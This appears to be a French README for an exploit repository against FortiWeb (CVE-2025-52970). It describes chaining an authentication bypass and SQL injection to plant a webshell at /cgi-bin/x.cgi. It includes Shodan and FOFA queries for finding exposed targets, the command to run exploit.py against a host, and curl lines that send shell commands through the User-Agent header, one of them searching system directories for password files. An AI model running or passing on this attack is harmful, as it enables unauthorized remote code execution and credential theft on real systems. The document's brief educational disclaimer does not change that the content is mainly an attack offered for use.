
Démontre un contournement d'authentification dans FortiWeb (CVE-2025-52970) combiné avec une injection SQL pour télécharger un webshell et obtenir une exécution de code à distance via les en-têtes HTTP.
Ce dépôt montre un contournement d'authentification dans FortiWeb qui peut être enchaîné pour réaliser une Exécution de code à distance (RCE).
L'exploit exploite un point d'accès vulnérable pour injecter des charges utiles SQL, télécharger un webshell et exécuter des commandes via des en-têtes HTTP.
⚠️ Avertissement:
Ce projet est à des fins éducatives et de recherche uniquement.
Ne PAS l'utiliser contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test.
((FortiWeb)) AND port:("8443")
### FOFA
title="FortiWeb" && port="8443"
### Shodan
ssl:"FortiWeb" port:8443
http.title:"FortiWeb" port:8443
CVE: CVE-2025-52970
Composant: API Fabric FortiWeb (/api/fabric/device/status)
Impact: Contournement d'authentification → Injection SQL → Téléchargement de webshell → RCE
Vecteur: En-tête Authorization forgé + injection SQL
Supprimer et créer une table SQL temporaire.
Écrire la charge utile du webshell par morceaux.
Exporter le shell vers /cgi-bin/x.cgi.
Télécharger un script Python auxiliaire pour déclencher les permissions.
Accéder au webshell en envoyant des commandes via l'en-tête User-Agent.
git clone https://github.com/your-username/Fortinet-AuthBypass-Exploit.git
cd Fortinet-AuthBypass-Exploit
python3 exploit.py -t https://TARGET:8443/
3️⃣ Interagir avec le webshell
curl -ks -H 'User-Agent: id' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: whoami' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: uname -a' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: grep -ril pass /etc /conf /data 2>/dev/null' https://TARGET:8443/cgi-bin/x.cgi
